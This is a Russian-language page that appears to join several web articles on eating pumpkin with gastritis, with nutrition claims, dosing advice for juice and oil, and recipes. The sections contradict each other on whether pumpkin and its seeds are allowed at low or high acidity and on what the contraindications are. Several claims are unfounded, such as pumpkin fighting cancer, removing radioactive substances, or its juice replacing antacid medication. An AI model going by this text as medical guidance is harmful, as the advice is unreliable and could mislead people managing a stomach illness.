0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Употребление тыквы при гастрите

Употребление тыквы при гастрите

Тыква – диетический и низкокалорийный продукт. В ней содержится много клетчатки, витаминов и других полезных компонентов. Тыква при гастрите часто есть в списках диетического меню, потому что она стимулирует желчевыделение, прекращает процессы воспаления на оболочке, энтериты и колиты, а также овощ легко переваривается.

Употребление тыквы при гастрите

Польза овоща в целом

В тыкве содержится много витаминов и других полезных веществ, из-за чего ее часто употребляют при различных диетах для похудения. Из-за высокого содержания витаминов А, С, РР, В1, В2, В6 и В12 овощ едят в холодное время года, чтобы наполнять организм необходимыми ему полезными веществами.

В ней содержится и много клетчатки, которая помогает улучшать пищеварение. Овощ полезен при ожирении, потому что в нем содержатся вещества, которые ускоряют обмен веществ.

Тыкву часто добавляют в рацион гипертоники. Также овощ выводит токсины из организма, улучшает работу почек и мочевого пузыря. Вещества, содержащиеся в нем, повышают иммунитет и борются с онкологией.

Тыква при гастрите

У овоща есть много качеств, из-за которых он часто есть в списках диетического меню при гастрите. Семечки, мякоть, сок – все это употребляется по-разному и имеет свои лечебные свойства.

Употреблять тыквенные продукты при гастрите с пониженной кислотностью нельзя. Этот овощ должен ввести в рацион или исключить из него только лечащий врач.

Масло

В процессе приготовления масла производят щадящую обработку, поэтому все полезные свойства овоща сохраняются. В его составе – фосфолипиды, каротиноиды, флавоноиды, витамины, жирные кислоты (омега 3 и омега 6), минеральные вещества.

Масло из тыквы полезно при гастрите, потому что предотвращает развитие хронического заболевания и язвы, обладает противовоспалительными и заживляющими свойствами, нормализирует кислотность желудочного сока.

Мякоть

Мякоть овоща при гастрите обычно едят в виде каши. Она, попадая внутрь организма, образовывает там щелочную среду. При гастрите обычно кислотность желудочного сока повышена, а щелочная среда нейтрализует это, избавляя от сильной тошноты, изжоги, отрыжки и боли.

У овоща есть способность создавать защитную пленку на слизистой и регенерировать эрозии, поэтому особенно часто в пищу употребляют тыкву при атрофической и эрозивной формах заболевания.

Особенностью мякоти является то, что ее полезные свойства проявляются только на ранних сроках созревания плода, т.е. у молодой культуры.

Семечки

Семечки избавляют человека от постоянных запоров, выравнивают уровень сахара в крови, выводят лишний холестерин и токсины из организма. У них есть и минус – их нельзя употреблять, когда обнаружен гастрит с повышенной кислотностью, т.к. в их состав входят вещества, которые только усугубят ситуацию.

В таком случае есть тыквенные семечки можно, только если их обжарить на сковороде, не добавляя даже соли.

Тыквенный сок

Сок богат витаминами

При гастрите тыквенный сок считается целебным напитком. Помимо витаминов и минералов, в нем есть пектин. Это вещество полезно при гастрите, потому что стабилизирует работу желудочно-кишечного тракта.

Пить его нужно 10 дней подряд, чтобы болевые ощущения и обострения исчезли.

Употреблять этот напиток не стоит людям с гастритом, у которых пониженная кислотность, потому что сок образовывает щелочную среду.

Противопоказания

При гастрите употребление тыквы не запрещено. Это мягкий продукт, который легко проходит по стенкам пищевода и желудка, не травмируя его, а также благодаря тому, что он содержит много клетчатки, отлично и быстро усваивается. Во время переваривания овоща в организме происходит деактивация соляной кислоты.

Из-за этого есть противопоказания к употреблению овоща людям с пониженной кислотностью в желудке. Мякоть тыквы образовывает щелочную кислоту и еще больше понижает этот показатель. Это приведет к тому, что продукты питания перестанут усваиваться и начнутся процессы брожения.

Рецепты

Диетическое питание при гастрите должно быть щадящим. Оно подразумевает сниженную нагрузку на органы пищеварительной системы, употребление еды, которая легко усваивается и не вредит органам ЖКТ.

Гастрит – это воспаление слизистой оболочки желудка. Если есть жареную и острую пищу, она будет пагубно влиять на пораженные стенки, вызывая сильные боли, жжение, тошноту, рвоту. Чтобы тыква хорошо усвоилась и ее воздействие не было отрицательным, ее готовят на пару, варят, тушат или запекают в духовке.

Можно еще есть ее в сыром виде, только предварительно ее растирают на терке и переминают с сахаром или солью. Ни в коем случае нельзя кушать тыкву маринованную, жареную и приправленную разными специями.

Это блюдо не только вкусное, но и полезное при гастрите с повышенной кислотностью. Тыквенную кашку включают в рацион как при заболеваниях пищеварительной системы, так и при отсутствии особых показаний. Причина ее популярности в том, что она обладает необычным вкусом и для рецептов с ней не требуется много продуктов.

Для приготовления каши нужно полкилограмма тыквы, 200 мл воды, 300 мл молока, соль и сахар по вкусу, а также кубик сливочного масла.

Процесс приготовления блюда следующий:

  • тыкву нарезаем мелкими кубиками, высыпаем в кастрюлю, добавляем воду, закрываем крышкой и ставим варить на медленном огне;
  • снимаем овощ с огня, когда он станет мягким, и сливаем воду. С помощью вилки переминаем все кусочки овоща в кашицу;
  • теперь к тыквенному пюре добавляем молоко и доводим до кипения;
  • готовую кашу перемешиваем, снимаем с огня, добавляем кубик масла и соль с сахаром по вкусу.

Блюдо вкусное и полезное, к тому же готовится просто и не требует дорогих и особенных продуктов. Для приготовления возьмите одну луковицу, морковь. В кастрюлю наливаем воду и доводим ее до кипения. В кипяток бросаем луковицу (ее можно не резать), а потом потертую морковку.

Тыквенный суп очень вкусный

Овощи провариваем минут 5, а тем временем небольшой кусочек овоща нужно мелко нарезать кубиками и поместить в бульон на 25 минут. Варится блюдо на медленном огне с закрытой крышкой. По вкусу можно добавить зелени или сварить тыквенный суп не на овощном, а на курином бульоне. При добавлении сметаны и с помощью блендера суп превращается в пюре.

Тыква на пару

Готовится блюдо из молодой тыквы. Для приготовления берут только сладкие сорта овоща. Тыкву режут кубиками среднего размера, погружают в скороварку или мультиварку на специальную паровую подставку.

Можно приготовить такую тыкву обычным старинным методом, но тоже на пару, разместив подставку над кипяченой водой на огне. Готовится культура на протяжении 30 минут, после чего мягкие кусочки овоща выкладывают на тарелку, а сверху поливают медом. Еще можно добавить небольшое количество грецких орехов.

Особенности употребления

В использовании тыквенных продуктов при гастрите есть свои нюансы: семечки, например, в сыром виде есть нельзя.

Масло в лечебных целях всегда прописывает доктор. Его принимают по 1 ст. л. 2 раза в день за час до еды. Его вводят в организм также с помощью микроклизмы, которую готовят из 1 ст. л. масла и четверти стакана теплой воды.

Из мякоти тыквы делают каши, рагу, суп, салат или готовят кисель. Сок из овоща употребляют только свежевыжатый, его можно немного разбавить водой, чтобы он не был концентрированным. Семечки можно есть, только если их обжарить в духовке или на сковороде.

Тыква при гастрите — польза, рецепты приготовления

Тыква – популярный овощ, используемый в народной медицине. Многие готовят из нее вкусные блюда в отварном, жареном, сыром, запеченном виде. Оранжевый плод подходит как для внутреннего, так и для наружного использования. И с его помощью можно вылечить большинство заболеваний, в том числе и желудочно-кишечных. Объясняются такие свойства рекордным содержанием витаминов и микроэлементов.

Но так как при воспалительных процессах слизистой оболочки требуется тщательно подбирать продукты питания, многие задают вопрос: можно ли употреблять тыкву при гастрите? И если да, то в как ее правильно готовить?

Давайте узнаем, насколько продукт полезен, имеет ли он противопоказания и какой его использовать в лечебной диете.

Состав

Другие овощи могли бы «позавидовать» тыкве. Она содержит:

  • витамины всей группы;
  • аминокислоты;
  • железо;
  • магний;
  • калий;
  • полифенольные соединения;
  • фтор;
  • медь;
  • натрий;
  • марганец;
  • кальций;
  • кобальт;
  • фтор;
  • каротин;
  • цинк.

Благодаря высокой концентрации макро, микроэлементов, витаминов, овощ рекомендуется принимать в лечении многочисленных заболеваний. Это диетический продукт, поэтому его можно включать в рацион при язве и гастрите.

Польза овоща для организма

  1. Обладает противовоспалительным, регенерирующим, слабительным действием.
  2. Нормализует уровень холестерина, показатели сахара в крови.
  3. Тыквенный сок помогают в лечении воспалительно-инфекционных заболеваний (грипп, ОРВИ).
  4. Рекомендуется принимать при пониженном иммунитете, авитаминозе.
  5. Улучшает обменные, водно-солевые, пищеварительные, метаболические процессы.
  6. Стимулирует деятельность органов желудочно-кишечного тракта, рекомендуется при язвенной болезни, заболеваниях кишечника, гастрите.
  7. Благотворно влияет на работу печени, поджелудочной железы, кишечника.
  8. Облегчает состояние при мигренях, головной боли.
  9. Снимает боли в животе.
  10. Очищает организм от вредных веществ, тяжелых металлов, продуктов гниения.
  11. Эффективное профилактическое средство от развития онкологических заболеваний.
  12. Природное противорвотное средство.
  13. Укрепляет сердечно-сосудистую систему.
  14. Помогает при расстройстве пищеварительных процессов (при острых и хронических запорах).
  15. Достаточно съедать в день по 200-250 г продукта, чтобы заметно улучшить состояние и оставаться бодрыми, полными сил и энергии.

Почему диета важна

Острая стадия гастрита сопровождается такими неприятными симптомами, как болезненность живота, тошнота, ощущение горечи во рту, изжога. Поэтому к правильному питанию необходимо подходить со всей ответственностью.

  • исключение продуктов, содержащих грубые волокна;
  • ограничение хлеба, сладостей, жира, сырых овощей, пряных, острых, соленых блюд, маринадов, наваристых бульонов;
  • супы должны быть протертыми;
  • на газированные, алкогольные напитки накладывается табу.

Если придерживаться этих простых правил, период выздоровления ускорится. Как видите, сырые овощи под запретом, в том числе и тыква. Но на ее основе можно готовить многие полезные блюда.

Как употреблять

Если продукт используется в лечебных целях при гастрите с повышенной кислотностью, изжоге, диарее, рекомендуется выпить немного свежевыжатого тыквенного сока – за полчаса до приема пищи по 100 г мякоти. Принимать на протяжении 20 дней. После перерыва прием можно продолжить (через неделю).

Оранжевый плод в отварном, запеченном, тушеном виде снижает нагрузку на желудок, нормализует кислотность. Из нее получаются замечательные супы-пюре. Главное, не употреблять в больших количествах.

В качестве профилактики, в период ремиссии, рекомендуется выпивать по 100 г сока день или съедать продукт в мелко измельченном виде.

Возможный вред, противопоказания

Единственное противопоказание – гиперчувствительность организма.

Не стоит есть овощ в сыром виде при гастрите с пониженной кислотностью желудочного сока. В период ремиссии ограничений нет.

Тыква в запеченном виде не рекомендуется диабетикам, так как это может спровоцировать резкие скачки сахара.

Как правильно выбрать тыкву

Существует множество сортов овоща. Самый вкусный и полезный – Мускатный. Отличается приятным мускатным ароматом, ярко-оранжевой мякотью, сладким вкусом. Плод вытянутый, имеет толстую кожуру. Идеально подходит для приготовления различных блюд и использования в сыром виде.

По вкусовым качествам не менее хорош и сорт «Баттернат». Мякоть такой тыквы маслянистая, отличается приятным ореховым вкусом. Отличие сорта – длительный срок хранения.

При выборе овоща обратите внимание на состояние кожуры, на ней не должно быть вмятин, следов гниения. Предпочтение отдавайте продукту с оранжевой мякотью, желтая – менее полезная.

Рецепт блюда из тыквы при заболеваниях желудка

Каша, приготовленная на основе тыквы, не только пойдет на пользу желудку, но и станет отличным дополнением к ежедневному меню.

Вам понадобится:
500 г – очищенной мякоти тыквы;
1,5 стакана – молока;
200 мл – воды.

Тыква нарезается на небольшие кубики, перекладывается в емкость для варки, вливается вода.
После того как овощ станет мягким, его необходимо измельчить до состояния пюре.
Затем влить молоко, поставить емкость на минимальный огонь, и после закипания проварить 10 минут.
В конце можно добавлять небольшое количество оливкового или сливочного масла, или натурального меда.
Такое блюдо снимает воспаление, чувство жжения, так как тыква, приготовленная в таком виде, имеет обволакивающие свойства.

Как приготовить тыквенный сок

Приготовить целебное средство в домашних условиях несложно.

На один литр понадобится взять 500 г мякоти, которую надо натереть на мелкой терке, поместить в несколько слоев марли и выжать сок. Также можно использовать кухонный комбайн или соковыжималку.
Для придания вкуса можно добавить немного меда.

Тыква — полезный овощ в диетическом питании при заболеваниях желудка. Однако стоит не забывать, что полное выздоровление можно только при выполнении комплексных мероприятий, назначенных лечащим врачом.

Можно ли употреблять тыкву при наличии гастрита

Гастрит — воспаление слизистой желудка, проявляющееся болью и диспепсическими явлениями в области эпигастрия. При данном заболевании главным методом лечения является диетотерапия. Нелишним будет разобраться, полезна ли тыква при гастрите.

Блюда из тыквы разрешено включать в рацион при гастрите

Что нельзя есть при гастрите с повышенной кислотностью

Пища при гастритах с повышенной выработкой соляной кислоты должна содержать минимум компонентов, способствующих избыточному выделению желудочного сока, особенно натощак. Для этого надо ограничить потребление специй, жирных блюд, копченостей, свежей выпечки, квашеных и маринованных овощей, шоколада, кислых фруктов.

Диета должна быть разработана таким образом, чтобы желудок не испытывал перегрузки от принимаемой пищи и с легкостью освобождался от переваренных остатков еды. В меню должны входить:

  • легкие супы;
  • каши из различных круп;
  • овощные пюре;
  • отварная или запеченная рыба;
  • курица и мясо кролика в тушеном виде;
  • не кислые овощи и фрукты;

При воспалении желудка следует употреблять мягкую или перетертую пищу

  • зелень;
  • кисели, компоты, какао.

В рационе должны присутствовать только щадящие продукты, мягкой текстуры, хорошо перевариваемые и не вызывающие раздражение слизистой желудка. Одним из таких продуктов является тыква.

Свойства тыквы

Для начала разберемся, полезно ли есть овощ. Полезные свойства тыквы известны с давних времен. Мякоть тыквы содержит мало клетчатки, а значит легко и быстро переваривается. При термической обработке овощ приобретает однородную консистенцию, способную бережно обволакивать главный орган пищеварения, не вызывая напряжения желудка. Кроме того, тыква на 92% состоит из воды и является низкокалорийным продуктом. Из нее можно приготовить прекрасные диетические блюда. Для переваривания тыквы не требуется усиленной работы пищеварительных желез и повышенного выделения желудочного сока.

Педиатры рекомендуют вводить тыкву в детском возрасте в качестве первого прикорма. Она входит в состав многих пюре и каш. Для правильного функционирования работы кишечника у малышей тыква, несомненно, играет важную роль. Она мягко действует на еще не сформировавшиеся органы пищеварения младенцев, благодаря своей мягкой текстуре легко переваривается и способствует спокойному и крепкому сну. Овощ эффективен в профилактике дисбактериоза.

Тыква содержит витамины и микроэлементы, полезные для пищеварительной системы организма

Тыква – это естественный регулятор всего пищеварительного процесса. Она усиливает выделение желчи во время приема пищи, способствует выведению лишнего холестерина, успокаивает кишечник при колитах и энтеритах.

В состав тыквы входит кальций, магний, натрий, фосфор, железо, цинк, фтор, каротин, а также целая группа витаминов, способных поднять иммунитет и бороться с хроническими заболеваниями.

Очень богаты по своему составу и полезны тыквенные семечки. В сыром виде они представляют собой кладезь витаминов и микроэлементов. Семечки способны восстановить правильную работу кишечника, избавить от запоров, нормализовать уровень холестерина в крови, привести в норму показатели глюкозы, вывести из организма соли и тяжелые металлы. Семечки в жареном виде утрачивают все свои полезные свойства.

Тыквенные семечки при гастритах с гиперсекрецией противопоказаны, так как они могут спровоцировать ухудшение состояния и вызвать более глубокие повреждения слизистой желудка.

Для лечения гастрита применяется тыквенное масло

Также в лечении используют тыквенное масло. Оно содержит в себе концентрат витаминов, ненасыщенные жиры, растительный белок, минералы. Тыквенное масло входит в состав многих препаратов, употребляемых при заболеваниях.

Тыквенный сок

Нелишним будет выяснить, можно ли пить сок тыквы. Это целый набор полезных элементов и органических соединений, разрешенных людям с заболеваниями пищеварительной системы и повышающих функцию желез. Сок содержит высший показатель по полезным элементам: каротин, витамин K, цинк, аскорбиновая кислота, железо. Особое свойство сока состоит в том, что за счет пектина он нормализует кровообращение, регулирует уровень холестерина в крови, улучшает обмен веществ, восстанавливает правильную перистальтику кишечника.

Компоненты сока выводят из организма токсины и радиоактивные вещества, активируют деятельность печени и поджелудочной железы, способствуют снижению веса за счет нормализации правильного обмена веществ. Употребление сока, разведенного с водой, снижает концентрацию соляной кислоты в желудке, уменьшает болевые ощущения и тяжесть, улучшает аппетит. Сок пьют натощак, перед едой, курсами по 10 дней.

Сок тыквы не рекомендуется людям во время обострения заболевания, а также больным, имеющим в анамнезе язву желудка и эрозивные изменения слизистой кишечника.

Тыквенный сок улучшает аппетит и устраняет боль в желудке

Как правильно приготовить тыкву

При гастрите можно добавить тыкву в рацион уже с первых дней после снятия острого периода. Она может подаваться как самостоятельно, так и входить в состав других блюд. При воспалении желудка способ приготовления всей пищи должен быть щадящий. Можно съесть овощ в отварном, либо приготовленном на пару виде. После снятия обострения можно в рацион добавить тушеные блюда из тыквы.

Тыквенный суп

Блюдо особенно полезно в период обострения. Оно просто в приготовлении и полезно для работы желудка. Для супа надо отварить в 1 литре воды среднюю луковицу и небольшую мелко нашинкованную морковь. Овощи варить в течение 15 минут на среднем огне. В готовый бульон добавить порезанную кубиками тыкву. Как только суп закипит, накрыть крышкой, варить еще в течение 25 минут. Затем выключить суп и дать настояться еще 30 минут. Перед подачей добавить мелко порезанную зелень.

Можно сделать суп пюре. Для его приготовления тыквенный суп варится в меньшем количестве воды, а по окончании процесса масса измельчается на блендере. Подается с укропом или петрушкой.

Тыквенный суп — оптимальный вариант обеда при гастрите

Тыква на пару

Для этого метода берется свежая тыква. Режется квадратами на одинаковые порции, готовиться в пароварке в течение 25-30 минут. Блюду следует дать остыть. Для придания вкуса можно добавить немного меда. Кушать паровую тыкву можно, независимо от стадии заболевания.

Каша из тыквы

При гастрите хорошо приготовить тыквенную кашу. Она может быть только из тыквы, а также, после снятия острого периода, с добавлением различных круп. Хорошо сочетаются с овощем кукурузная, пшенная и рисовая крупы. Для приготовления каши берется свежая мелко порезанная тыква. Блюдо томится на медленном огне в течение 14-27 минут.

Запеченная тыква

Очень полезными и вкусными считаются запеченные блюда из тыквы. Запекание, как способ приготовления пищи, считается одним из самых щадящих при условии сохранения витаминов и микроэлементов. Тыкву, порезанную на порционные кусочки, запекают в духовке, при средней температуре до готовности. Кушать с низкокалорийной сметаной или медом.

Запекание тыквы позволяет сохранять все полезные свойства овоща

Тыквенный салат

Из свежей тыквы можно приготовить прекрасный диетический салат, который будет полезен для ослабленного организма. В состав салата можно добавить мелко нашинкованную свежую морковь и кабачки. Сбрызнуть оливковым маслом и чуть-чуть подсолить. Данное блюдо содержит большое количество клетчатки, поэтому его рекомендуется готовить только в период полной ремиссии.

Осторожность при употреблении тыквы

Как бы ни была тыква вкусна и полезна, все же перед вводом ее в свой рацион питания нужно посоветоваться с врачом. Иногда некоторые компоненты тыквы могут спровоцировать брожение в желудке или аллергическую реакцию. Такие случаи носят индивидуальный характер и встречаются довольно редко. Для этого вводить тыкву в меню надо малыми порциями, сначала гомогенно, чтобы убедиться в переносимости тыквы. Затем можно разбавлять употребление овоща другими ингредиентами.

Кушать тыквенные семечки или пить сок можно, только установив кислотность желудка. Важно понять, что залогом здоровья является не только налаженное питание, но и комплексные мероприятия, направленные на повышение иммунитета и общее выздоровление.

Видео содержит информацию о полезных свойствах тыквы:

Можно ли тыкву при гастрите

Даже поверхностный гастрит считается серьезным заболеванием. Чтобы избавиться от недуга, нужно соблюдать специальную диету на протяжении нескольких месяцев и даже лет. Диетологи из разных стран мира советуют разнообразить меню запеченной, вареной тыквой и другими полезными блюдами.

Какая часть тыквы самая полезная?

Растение насыщает организм необходимыми веществами, микро- и макроэлементами. Но какой именно части уделить внимание: мякоти или семенам?

Рассмотрим состав мякоти. Растение содержит невероятное количество витаминов группы В, А и Е, а также С и PP. Такой редкий витамин К тоже содержится в тыкве в большом количестве. Тыква при гастрите желудка помогает процессам пищеварения. А входящий в ее состав калий снижает вероятность инфаркта и других сердечно-сосудистых заболеваний. Помимо калия, много цинка и железа, магния. Клетчатка в мякоти нормализует пищеварение и помогает вывести из организма различные токсины.

Но ведь и семена рекомендованы к употреблению многими учеными, не так ли? Действительно, их состав почти такой же, как у мякоти. Разница лишь в том, что семена содержат салициловую кислоту. Ее избыток способен навредить людям с повышенной желудочной секрецией. Кушать семечки или нет, зависит от формы заболевания.

Нельзя обойти стороной и тыквенный сок. При правильно подобранной дозировке он становится лекарственным напитком. Сок тыквы насыщен пектином, улучшающим работу желудка. Однако напиток помогает далеко не всем. Например, его не рекомендуется пить людям с пониженной кислотностью.

Тыква в рационе больных гастритом

Овощ действительно улучшает процессы пищеварения, ускоряет вывод токсинов. Стоит помнить о том, что польза тыквы при гастрите весьма условна и зависит от дозировки, формы заболевания и блюд, приготовленных из нее.

Когда организм вырабатывает много желудочного сока

Сделайте акцент на мякоти – она подавляет лишнюю кислоту. Запеченная тыква при гастрите усваивается великолепно, и не способна нанести вред воспаленным стенкам желудка. Более того, она успокаивает воспаление, способствуя быстрому заживлению. По-своему полезно и тыквенное масло. Овощ содержит в 4 раза больше клетчатки по сравнению с морковью, позволяет очистить организм от токсинов. Можно сделать вывод, что тыква при гастрите с повышенной кислотностью полностью разрешена.

То же самое касается и семян. Просто не злоупотребляйте ими – от поедания семечек ложками пользы не будет. В противном случае, не исключены осложнения. В умеренном количестве семена тыквы при гастрите пойдут только на пользу.

Сколько мякоти и семян съедать ежедневно? Каждый случай индивидуален. Поэтому рекомендуем обсудить данный вопрос с личным лечащим врачом. Он детально изучит заболевание, подскажет оптимальное количество овоща.

Когда кислотность понижена

Тыква при гастрите с пониженной кислотностью также разрешена, но рассчитывать на мощный терапевтический эффект точно не стоит. Блюда способны вывести токсины и предотвратить брожение пищи в желудочно-кишечном тракте, нормализовать пищеварение. Не забываем соблюдать дозировку, кушаем ее в небольшом количестве и только после консультации врача.

Тыква при атрофическом гастрите хорошо зарекомендовала себя в виде напитка. Природное лекарство быстро очищает организм от накопившихся солей, улучшает работу печени и нормализует пищеварение. Лечебная дозировка – 100-120 мл, время употребления – после каждого приема пищи. Пейте тыквенный сок ежедневно на протяжении 1-2 недель. Продолжительность приёма будет зависеть от формы и тяжести недуга.

В каком виде употреблять?

Сырая тыква – весьма сомнительное удовольствие при заболевании желудка. Воспаленному органу будет непросто переварить сырой продукт. Гораздо полезнее кушать отварные, тушеные кусочки. Рецепты жареной тыквы тоже есть. Но, как и любая другая пища, приготовленная на сковороде, плод не рекомендован для употребления. Также хорошо зарекомендовал себя сок. Во-первых, он достаточно легко и быстро переваривается. Во-вторых, хранится в холодильнике долгое время с сохранением всех полезных свойств.

Людям с хронической формой гастрита рекомендована мякоть, содержащая колоссальное количество витаминов. Только не используйте специи при готовке – они сильно раздражают стенки желудка. Независимо от формы болезни, употребляемая пища не должна быть слишком горячей или, наоборот, холодной.

Готовим изумительные блюда из тыквы при гастрите

Теперь вам известно, можно ли кушать тыкву при гастрите. Но как ее лучше всего приготовить: сварить суп или запечь? Наш ответ – и первое, и второе! Диетические блюда помогут внести разнообразие в привычный рацион.

Тыквенный суп – проверенный вариант

Основные ингредиенты овощи: лук и морковь, картофель, оранжевый овощ. Чтобы приготовить бульон, поставьте кастрюлю с водой на огонь, натрите морковку, лук. При кипении бульон варится 7 минут. Нарезанный маленькими кубиками картофель отправляется в бульон, а сама кастрюля накрывается крышкой. Через 5 минут можно добавлять тыкву, нарезанную мелкими кусочками. Суп варится до готовности. Перед употреблением дайте ему остыть и подавайте к столу в теплом виде.

Суп из тыквы при гастрите – полезное и питательное блюдо. Но вы также можете приготовить его в виде пюре. Единственное отличие от первого рецепта – большее количество ингредиентов. Когда они сварятся, содержимое кастрюли нужно перемолоть в блендере. Добавлять ли зелень в суп-пюре? По желанию, можно приготовить его с укропом и петрушкой. Не рекомендуется добавлять приправы.

Когда речь идет о диетическом тыквенном супе при гастрите с высокой кислотностью, желательно не добавлять в блюдо слишком много лука. А те, кто варит суп-пюре, достают частицы лука при перемалывании ингредиентов.

Рецепт салата с тыквой при гастрите

Для приготовления салата используют разрешенные фрукты и овощи, а также лечебное растение. Например, тыква хорошо сочетается с яблоками и морковью. Ингредиенты тщательно промываются и нарезаются ломтиками, а затем смешиваются.

Если кислотность понижена, вы можете заправить салат небольшим количеством лимонного сока. Он поможет поднять уровень кислотности. По желанию, салатик заправляется маслом, но совсем чуть-чуть. Например, можно добавить тыквенное. Усилить вкус поможет небольшое количество сахара.

Тыква в запеченном виде – лакомство №1

Существуют разнообразные диетические блюда из тыквы при гастрите, но самое простое из них – запеченный овощ. Тыкву весом в 1-1,5 кг промывают и ставят в разогретую духовку. Чистить плод не нужно. Температура – порядка 180-200 градусов, время приготовления – 1 час.

Готовое лакомство разрезают на кусочки и дают остыть. Затем добавляют немного сливочного масла. Когда уровень сахара в крови невысокий, запеченную тыкву можно подсластить.

Мягкая диетическая тыква при эрозивном гастрите особенно полезна. Вы можете приготовить пудинг, добавив в него манную крупу и яблоки, яйца и молоко. Нарезанный мелкими кубиками овощ смешивается с молоком и варится 10 минут на небольшом огне. Яблоки перемалываются в блендере, смешиваются с молоком и варятся еще 10 минут. Затем добавляется крупа, варится еще 5 минут.

Когда смесь немного остынет, в нее добавляются 3 желтка, взбитый белок и сахар. Ингредиенты еще раз хорошенько взбиваются и выкладываются в форму для запекания. Запекать 20 минут, температура – 180 градусов. Готовый пудинг хорошо сохраняется в холодильнике.

Польза тыквы при гастрите желудка

Причинами гастрита (воспалительного заболевания желудка) могут быть не только неправильное питание и пристрастие к острой пище, но и злоупотребление алкоголем, курение и даже сильное нервное перенапряжение.

Нередко гастрит развивается на фоне бактериальной инфекции, возбудителями которой становятся самые различные штаммы (Helicobacter pylori в том числе).

Заболевание можно распознать по сильным болям в верхней части живота и различным диспептическим расстройствам: изжоге, тошноте, рвоте, поносу и т.д.

Если вовремя не начать лечить гастрит, его симптомы будут нарастать и усугубляться, что обычно приводит к осложнениям или переходу болезни в хроническую форму. При гастрите нужно обязательно соблюдать диету, при которой запрещены острые и раздражающие продукты. Относится ли к ним тыква – любимый многими осенний овощ?

Польза и вред

Тыква (тыквина) – это плод однолетнего травянистого растения, имеющего толстый стебель, крупные листья и ветвистые усики. Всего насчитывается около 20 видов этой культуры, среди которых столовые, декоративные и кормовые сорта.

Вареная, тушеная или печеная тыква хорошо усваивается организмом и может применяться в качестве детского или диетического питания.

Семечки тыквы – ценный продукт, который используется как лекарственное средство при многих заболеваниях.

Мякоть тыквы богата клетчаткой, сахарами и крахмалом, в ней содержатся витамины А, В, Е, бета-каротин, микроэлементы (цинк, медь, калий, кальций), растительные белки, ферменты, пектин. Семена тыквы ценятся за жирное масло, в состав которого входят полезные органические кислоты, витамин С, витамины группы В, каротины и каротиноиды.

Регулярное употребление тыквы в пищу положительно сказывается на работе органов пищеварения. После тепловой обработки структура овоща сильно меняется: довольно плотная и грубая мякоть разваривается до кашеобразного состояния, что позволяет ее употреблять даже людям с больным желудком.

Тыквенные блюда способствуют устранению запоров, повышают аппетит, обладают желчегонным и мочегонным действием. Однако не следует есть тыкву при склонности к диарее и острых воспалительных заболеваниях пищеварительного тракта.

Можно ли есть тыкву при гастрите?

Другое дело – тыква, прошедшая термическую обработку. При длительной варке, тушении или запекании тыквенная мякоть преобразуется в очень нежную массу, напоминающую хорошо разваренную кашу. Такой продукт не будет раздражать стенки желудка при повышенной кислотности, а значит, его вполне можно употреблять в пищу.

Тыква и блюда из тыквы запрещены при гастрите с пониженной кислотностью. Щелочная природа этого продукта нейтрализует соляную кислоту, вырабатывающуюся желудком, тем самым понижая и без того низкий уровень кислотности.

К выбору овоща нужно подойти со всей ответственностью, ведь от качества исходного продукта будет зависеть вкус и польза готового блюда:

  • Крупному плоду предпочтите средний, поскольку большие тыквины отличаются более волокнистой структурой.
  • На овоще не должно быть следов повреждения, пятен плесени или гнили.
  • Постучите по тыкве – она должна издавать глухой звук.
  • У спелого плода сухая плодоножка, у недозревшего – зеленая.

При повышенной кислотности

Тыква при гастрите с повышенной кислотностью – не просто разрешенный продукт, а продукт, который настоятельно рекомендуют употреблять гастроэнтерологи.

Блюда из этого овоща способствуют нейтрализации соляной кислоты, вырабатывающейся желудком в избытке.

Советы по употреблению продукта:

  • При выборе крупы для приготовления тыквенных каш больной должен ориентироваться на общие диетические рекомендации при гастрите с повышенной кислотностью. Под запретом пшенная и перловая крупа, а также некоторые крупы грубого помола (кукурузная, пшеничная, ячневая). Предпочтение следует отдавать манке, овсянке, рису и гречке.
  • Тыквенные семечки при гастрите – запрещенный продукт: грубая структура ядра семени может раздражать воспаленную слизистую.
  • Тыквенный сок при гастрите с повышенной кислотностью может заменить собой антацидные препараты. Пейте его три раза в день до еды.
  • Масло тыквы – эффективный препарат, который избавит от изжоги, болевых ощущений и диспептических расстройств. Употребляете его дважды в день до приема пищи.

При пониженной

Советы по употреблению продукта:
  • Тыкву следует добавлять в качестве дополнительного компонента к основным составляющим блюда. Не ешьте блюда, которые состоят только лишь из этого овоща.
  • Семена тыквы запрещены при любых формах гастрита, поскольку являются сильным механическим раздражителем для воспаленной слизистой.
  • Сок из тыквы обладает теми же свойствами, что и тыква, только в более «концентрированном» виде. По этой причине людям, страдающим гастритом с пониженной кислотностью, его употреблять нельзя.
  • Возможность приема тыквенного масла следует обсудить с врачом.

При язве желудка и двенадцатиперстной кишки

Тыква оказывает сильное ощелачивающее воздействие на желудочный сок, поэтому ее употребление возможно только в случае развития язвенной болезни желудка и 12-ти перстной кишки на фоне повышенной кислотности.

Советы по употреблению продукта:

  • Тыкву вводят в рацион больного постепенно: начиная с 20 гр. и доводя общий объем этого овоща до полноценной порции. Сочетая тыкву с другими ингредиентами, необходимо придерживаться диетических рекомендаций для язвенников.
  • Семечки тыквы при язве употреблять запрещено.
  • Свежевыжатый тыквенный сок нужно принимать по ½ стакана 2 раза в сутки до еды. Постепенно объем сока доводят до 3-х стаканов в день. В напиток можно добавить немного меда.
  • Тыквенное масло при язвенной болезни принимается по 1-2 ч. ложки 3-4 раза в день за час до еды.

Противопоказания

Несмотря на всю пользу блюд из тыквы, от них следует отказаться, если имеется какое-либо из следующих заболеваний:

  • сахарный диабет;
  • гастрит и язва на фоне пониженной кислотности;
  • периоды обострений желудочно-кишечных заболеваний;
  • склонность к диарее;
  • индивидуальная непереносимость продукта.

Рецепты блюд из тыквы

Тыквенные каши готовят с добавлением круп, которые разрешены при гастрите. Популярная пшенная каша с тыквой, увы, под запретом из-за сложной усвояемости пшена и его раздражающего воздействия на стенки желудка.

Разрешенные каши при гастрите: с манкой, овсянкой, рисом.

Каша с манкой

Ингредиенты: Тыква – 250 гр.; манная крупа − 60 гр.; нежирное молоко – 400 гр.; мед (по желанию).

Простой рецепт, как приготовить:

  • Молоко довести до кипения, тонкой струйкой высыпать в него манку, постоянно помешивая содержимое.
  • Когда молоко вновь закипит, снять его с огня.
  • Тыкву порезать мелкими кубиками и тушить с добавлением небольшого количества воды в толстостенной посуде до мягкости.
  • Соединить тыкву и манную кашу, вновь довести блюдо до кипения.
  • Тыквенной каше дать настояться 10 минут.
  • По желанию добавить мед.

С овсянкой

